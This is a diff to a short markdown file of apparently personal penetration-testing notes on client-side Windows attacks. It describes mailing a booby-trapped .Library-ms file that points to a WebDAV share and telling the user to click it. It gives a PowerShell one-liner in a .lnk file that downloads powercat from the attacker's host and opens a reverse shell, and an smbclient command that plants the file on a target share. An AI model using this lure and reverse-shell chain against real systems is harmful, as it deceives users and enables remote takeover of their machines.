ThomasBucaioni/pentools/microsoft/cside.md

 #### Extension `.Library-ms`

-Make a `myautomatedfakeinstalltofoolsomeuser.Library-ms` file pointing to the Webdav share on Kali, send it by mail and tell the user to click it.
+Make a `myautomatedfakeinstalltofoolsomeuser.Library-ms` file pointing to the Webdav share on Kali, send it by mail and tell the user to click it. \
 In the Webdav share, prepare a reverse shell.
-For example with [PowerCat](https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1), make a `.lnk` file:
+For example with [PowerCat](https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1) in a `.lnk` file:
 ```
 powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://myip:myhttpport/powercat.ps1');powercat -c myip -p myncport -e powershell"
 ```
-Instead of sending the Library file by email, it can be share by Samba:
+Instead of sending the Library file by email, it can be shared by Samba:
 ```
 smbclient //$TargetIp/$TargetSharedDirectory -c 'put myautomatedfakeinstalltofoolsomeuser.Library-ms.Library-ms'
 ```